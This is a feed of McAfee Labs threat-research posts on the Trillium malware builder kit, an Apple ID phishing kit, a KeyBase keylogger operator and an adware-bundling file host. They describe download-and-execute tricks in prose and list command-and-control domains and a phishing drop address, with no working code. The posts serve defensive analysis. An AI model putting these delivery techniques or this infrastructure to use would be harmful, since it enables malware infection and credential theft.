The post Trillium Exploit Kit Update Offers ‘Security Tips’ appeared first on McAfee Blogs.

]]>
McAfee Labs has previously blogged about the Trillium Exploit Kit Version 3.0, which is commonly used to create and distribute malware. Last week, Version 4.0 appeared on several underground forums.

We have analyzed the new version of the tool and it contains new functionality. These include:

  • PDF downloader
  • Password generator
  • Security tips

PDF downloader

od_2305_004

The user has several options when creating a PDF downloader, though all of these options create very similar PDF files.

od_2305_005

Upon opening the file with our FileInsight tool, we can clearly see the PDF using the OpenAction function to invoke PowerShell, which will download and execute a file.

Password generator

A strange addition to the toolkit is a password-generating component.

od_2305_006

This will create a randomly generated string to be used as a password for any account. Users can save this password on their machines. Upon clicking the button, a text file is created that contains a clear-text unencrypted copy of the password.

od_2305_007

od_2305_008

This is not very secure.

Security tips

The oddest addition to Trillium is the inclusion of several security tips to help users avoid malware infections. We find this ironic because the purpose of the software is to breach the security of user environments.

There are various tips on antiphishing, downloading, uninstalling vulnerable software, and password use.

od_2305_015

In use

We have seen this toolkit used in the wild to target a bank in the Asia-Pacific region. This email contains a malicious PowerPoint file.

od_2305_009

The attachment is a .PPSX file, a PowerPoint Show file starts the app in slideshow mode. This trick has been used many times to mask what is happening in the background.

The .PPSX file contains an embedded VBS.Downloader Trojan created using the Trillium 4.0 toolkit. A feature in PowerPoint can execute embedded OLE objects; the attacker has taken advantage of this by creating a custom action to execute the embedded VBS.Downloader when the PowerPoint slide is opened. (Click here for more information on the custom animation feature.)

Customer animation feature used to execute the embedded VBS file.

 

od_2305_011
VBS.Downloader Trojan created by Trillium 4.0.

The VBS file downloads a password-stealing Trojan that targets the following software:

  • FireFox
  • ThunderBird
  • SeaMonkey
  • Opera
  • Outlook
  • Pidgin

The password stealer has keylogging functionality and will create a log file in the %APPDATA%\LOGS folder in the format DD-MM-YYYY. The malware encrypts these log files with XOR 0x9D and then adds 0x24. In order to decrypt these, we need to reverse this algorithm. So we sub 0x24 and then XOR this with 0x9D.

od_2305_020
Encrypted log file.

 

od_2305_019
Decrypted log file.

The malware attempts to contact the following servers:

  • adzone.duia.eu
  • adzone.ddns.net
  • adzone.zzzz.io

McAfee has the following signatures for the Trillium malware:

  • W97M/Downloader.bdu
  • Trojan-FISA
  • Downloader-FBEF

We recommend that our customers read this post on best practices. The advice should help mitigate some of the infections seen by malware created by this toolkit.

The post Trillium Exploit Kit Update Offers ‘Security Tips’ appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/trillium-exploit-kit-update-offers-security-tips/feed/ 0
Hacktivists Turn to Phishing to Fund Their Causes https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/hacktivists-turn-phishing-fund-causes/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/hacktivists-turn-phishing-fund-causes/#respond Wed, 16 Mar 2016 23:33:34 +0000 https://blogs.mcafee.com/?p=48368 At McAfee we recently observed a phishing campaign targeting Apple account holders. The link directed the user to a compromised WordPress site used to serve the fake Apple ID login page. Users are asked to log in with their Apple IDs, and then are requested to update billing information and credit card details. In the following images […]

The post Hacktivists Turn to Phishing to Fund Their Causes appeared first on McAfee Blogs.

]]>
At McAfee we recently observed a phishing campaign targeting Apple account holders.

1403_od001

The link directed the user to a compromised WordPress site used to serve the fake Apple ID login page.

1403_od043

Users are asked to log in with their Apple IDs, and then are requested to update billing information and credit card details. In the following images we have highlighted some indicators that the site is not legitimate.

e1403_od063

Users are then redirected to the official Apple page.

1403_od073

The phishers usually create a local .zip file that contains all of their scripts to create the phishing page. They upload this file to a compromised server, extract it, and delete the file. On this occasion, the phisher appears to have forgotten to perform this last step.

1403_od003

This oversight enabled us to see how the website code worked; we found some interesting comments.

The .zip file contained a readme that states the results would be stored locally, although this was not the case.

1403_od005

We also found some .htaccess files. These are used to block access to the site by checking the originating IP of the connection. This is done to prevent the site’s being accessed and analyzed by robot scrapers.

1403_od004

Depending on the page a user lands on—credit card, Apple login, or address change—a .php script generates an email and sends it to bayremking0@gmail.com.

1403_od006

In one of the .php files we found a reference a hacktivist group. We did some investigating and found this name had been associated with several website defacings. The group’s activities promote a set of political views, so we suspect that the group was funding its operations through this new phishing scam.

We received another phishing email that was identical to the original one apart from the URL it linked to. It served the same fake Apple page but this time it did not contain the .zip file. We went to the homepage of the compromised site and found it had also been defaced.

This confirmed our view that the original phishing site was hacked by the hacktivist group. It seems that political hackers are now using their skills to generate income to aid their causes.

McAfee customers are protected from this campaign through heuristic definitions and McAfee Global Threat Intelligence reputation.

The post Hacktivists Turn to Phishing to Fund Their Causes appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/hacktivists-turn-phishing-fund-causes/feed/ 0
Trillium Toolkit Leads to Widespread Malware https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/trillium-toolkit-leads-widespread-malware/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/trillium-toolkit-leads-widespread-malware/#respond Fri, 04 Mar 2016 22:42:17 +0000 https://blogs.mcafee.com/?p=47850 Any aspiring cybercriminal can buy one of many malicious toolkits to craft a downloader and distribute malware. After a time these downloaders are leaked to forums and other download sites and become available to the masses. This is often when we see a spike in their use. The toolkit Trillium Security MultiSploit Tool v3 was cracked last week […]

The post Trillium Toolkit Leads to Widespread Malware appeared first on McAfee Blogs.

]]>
Any aspiring cybercriminal can buy one of many malicious toolkits to craft a downloader and distribute malware. After a time these downloaders are leaked to forums and other download sites and become available to the masses. This is often when we see a spike in their use.

The toolkit Trillium Security MultiSploit Tool v3 was cracked last week and uploaded onto several malicious forums.

tril_010316_001

Trillium was created by a coder using the same name. The program contains a EULA that mentions it should not be used maliciously, but we are well aware that these types of kits are used for generating malware.

tril_010316_002

In order to use the builder, the user needs to acknowledge the EULA by clicking on a button. So we guess everyone who is using it is violating the policy.

Whenever you use the tool to create an exploit or a downloader you are reminded yet again not to use it maliciously.

.tril_010316_003

Version 1 of this this tool appeared for sale at the end of last year for US$300 on a popular hacking forum. Since then, it has been updated to Version 3.

tril_010316_004

This toolkit allows the user to create several types of downloaders. It breaks them down into three options:

  • Windows shortcut exploits
  • Silent exploit
  • Macro exploits

Windows shortcut exploits rename an executable to a specified filename and create a LNK file that uses PowerShell to execute.

tril_010316_005

This type offers the option to use different icons and file extensions, all to trick the target into executing the LNK file.

A silent exploit creates a file that downloads and executes a specified file from the Internet. The users have the option to create the following file types:

*.chm,*.wsf, *.vbs, *.hta, *.htm, *.html, *.bat, *.cmd, *.ps1, *.psc1, *.exe, *.pif, *.scr, *.com, *.url, *.lnk

Depending on the chosen options, the toolkit will create one of the following files:

  • A Powershell script
  • A Visual Basic executable
  • A Visual Basic script

The PowerShell script, executed as hidden, downloads and runs a file.

tril_010316_007

The Visual Basic executable downloads and executes a file.

tril_010316_011

The Visual Basic script again downloads and executes a file.

tril_010316_032

Macro exploits allow users to create a macro that will download and execute a file. This type of attack is very common today; we have seen it used to spread Dridex and other ransomware families. The tool can create several macro versions, for example:

tril_010316_013

We have already observed this toolkit being used to distribute malware. We have seen spam campaigns using the macro exploit component, for example:

tril_010316_014

Detection
McAfee has several drivers that detect the files created by this toolkit. Detection is included in DAT Versions 8094 and later.

  • Trojan-FHYT
  • Trojan-FHYU
  • W97M/Downloader.azi
  • W97M/Downloader.azj
  • W97M/Downloader.azk

We also recommend our customers read this blog containing preventive measures against Dridex. The advice should help mitigate some of the infections seen by malware created by this toolkit.

The post Trillium Toolkit Leads to Widespread Malware appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/trillium-toolkit-leads-widespread-malware/feed/ 0
Malicious Forums Turn Amateur Hackers Into Cybercriminals https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/malicious-forums-turn-amateur-hackers-into-cybercriminals/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/malicious-forums-turn-amateur-hackers-into-cybercriminals/#respond Thu, 25 Feb 2016 19:18:22 +0000 https://blogs.mcafee.com/?p=47737 Security researchers are aware of forums that offer downloads of malicious software such as keyloggers and remote access tools. Some inexperienced hackers may visit these forums and decide to chase the money and create a malicious agenda. The following is a snippet from a popular hacking forum. We recently received a submission with the filename 17_02_16~_HKL_Purchase_Order.ace. This […]

The post Malicious Forums Turn Amateur Hackers Into Cybercriminals appeared first on McAfee Blogs.

]]>
Security researchers are aware of forums that offer downloads of malicious software such as keyloggers and remote access tools. Some inexperienced hackers may visit these forums and decide to chase the money and create a malicious agenda.

The following is a snippet from a popular hacking forum.

blog_1702_od007

We recently received a submission with the filename 17_02_16~_HKL_Purchase_Order.ace. This file contained another file with a .scr (screen saver) extension. The extracted file was a keylogger/password stealer known as KeyBase.

KeyBase comes in a kit:

blog_1702_od005

The KeyBase kit offers various configuration options. The password option allows the user to steal passwords from various mail clients/browsers and other popular applications. These kits make it very easy for anyone with little to no skill to create malicious programs.

We replicated the sample and navigated to the control server:

blog_1702_od002

We noticed that it had a very specific welcome message, so we decided to do some searching.

We found the username shown on the control server had been registered on several malicious forums. Upon further investigation we found this actor had downloaded several malicious kits and probably got the builder for KeyBase from one of these sites. The activity on some sites dated to 2013.

blog_1702_od008

We next tried to find out if this actor was involved in any past malicious activities. We looked at how the actor tried to spread the malware and whether the filename of the .ace file was unique. We found only one other instance of a similar filename.

blog_1702_od010

The file we found dated back January. Upon analyzing the file, we found it to be the keylogger HawkEye. This keylogger is very easy to find on these malicious sites.

Here is a screen shot of Version 3 of the malicious builder:

blog_1702_od009

We dived deeper and found the email address associated with the hacking forum accounts. We found five domains that were registered using this email address:

blog_1702_od011

As we wrote this post, all of these domains were down. However, it is more than likely that these domains were or will be used for malicious purposes.

We found a username associated with the email address on the popular file-sharing website 4shared.

blog_1702_od014

This user had uploaded 12 files, including a text file with nearly a half-million email addresses. This would have no doubt been used as part of a spam campaign to spread the malware.

blog_1702_od012

With all the information that we have collected, we can see that malicious forums make it easy for someone with little skill to create malware. An experienced actor would work in a much more covert way. However, both types can be dangerous.

McAfee detects this keylogger threat as Trojan-FHWM since DAT Version 8079.

The post Malicious Forums Turn Amateur Hackers Into Cybercriminals appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/malicious-forums-turn-amateur-hackers-into-cybercriminals/feed/ 0
File-Hosting Site Turns Your File Into Adware https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/file-hosting-site-turns-file-adware/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/file-hosting-site-turns-file-adware/#respond Thu, 28 Jan 2016 21:13:22 +0000 https://blogs.mcafee.com/?p=47177 We recently received a sample from a customer and upon initial analysis it looked like a bundled software installer. Upon execution, the installer launches a website and then attempts to download an executable—an installer for FLV Player. Nothing out of the ordinary, but what grabbed our attention was the website that had loaded after execution. […]

The post File-Hosting Site Turns Your File Into Adware appeared first on McAfee Blogs.

]]>
We recently received a sample from a customer and upon initial analysis it looked like a bundled software installer. Upon execution, the installer launches a website and then attempts to download an executable—an installer for FLV Player. Nothing out of the ordinary, but what grabbed our attention was the website that had loaded after execution. It appeared to be a “Thanks for installing” page but the domain name looked odd.

fake landing

We navigated to the top level of this site and found several subsites.

 

fake_landing

Clicking through these, we found all of them to be fake pages that show users an advertisement to entice them to install another piece of software. This tactic is common with installers for potentially unwanted programs (PUPs), but it is uncommon for one website to have several fake pages.

The common thread is that they all show ads from castplatform.com. A copy of the script used on these pages follows:

ad_scripts

Some of the pages we found were fake landing pages for common applications including:

  • VLC Player
  • CamStudio
  • FreeRideGames
  • FileHippoMineCraft Projects
  • Brothersoft

We decided to dive deeper and try to find the source of this installer.

This is usually the tricky part when dealing with PUPs due to the different techniques used by the authors. Most PUPs include no company or owner information, no homepage, come only in bundles, and require certain switches for the installer to work.

Our first step was to see if we could find other files that connected to these fake landing pages. We soon discovered thousands of these; they all showed similar behavior.

Once we gathered all the samples we knew our best shot was to get a list of all the domains that were contacted. The logic behind this was to look at the list and see if there was a common domain that appeared more frequently than others. It was likely this domain hosted the files.

We found a few common websites that the installers contacted, so we began to go through them. A couple stood out; these were file upload sites. We assumed these file upload sites bundled the uploaded files with a new installer.

The two sites that gained most of our attention were File-space.org and 100lm.ru. File-space.org made it clear that it was about monetizing.

filespace_2501

Here is a snippet from the FAQ page:

 

filespace_eula1

Here is how much its users can make:

 

sendspace_tarrif

It works out between £8 and £16 per one thousand downloads.

From reading the FAQ, we seemed to be on the right track. So we signed up to the website and uploaded a file. We then downloaded the uploaded file and found that it was indeed bundled with other applications. However, the behavior was not the same as our customer’s file. So our search continued for the source of our sample.

Our attention now went to 100lm.ru. This website had no detailed FAQ/EULA/Tariff page and no mention of monetization.

100lm.ru

What we instantly noticed was a catalog page.

correct_pupsite

Any file that anyone uploads to the site appears on this list. This means that anyone can download files anyone else uploads, even those rated “not so secure.” Regardless, we came here to find the source of our PUP installer.

We chose one file to download. As you can see from the following image, this file had been downloaded more than one thousand times.

100lm.ru

We replicated the file and found the behavior to be exactly the same as our initial sample.

So we downloaded a couple more of these files and we hit the jackpot. Every one we chose loaded the fake landing page. We checked the digital signature of the files and they all matched the one in the file we originally received.

digisig

Just to double-check, we uploaded our own file and downloaded it. The downloaded file was bundled with other software that loaded the fake landing page when executed.

What is different between the two upload sites is that 100lm.ru does not inform users that it is bundling; thus that site makes all the pay-per-install (PPI) revenue. This is extremely misleading. Even if a fake landing page was not loaded, this behavior would still warrant PUP detection.

Here is a flow of how this PUP spreads:

flow_2801

Our findings show that you have to be very careful when choosing a file-hosting website. We recommend that you use the most popular ones and do a simple check to see if the file you upload is the same as the one that you download.

A simple way to do this is to use the command-line tool FC.exe, which is available on every Windows system. It compares two files and will highlight any differences.

Usage: FC.exe “file1” “file2”

Malicious domains:

Detection for the malicious installer has been added as Adware-FakeLand and is covered in DAT Version 8055.

The post File-Hosting Site Turns Your File Into Adware appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/file-hosting-site-turns-file-adware/feed/ 0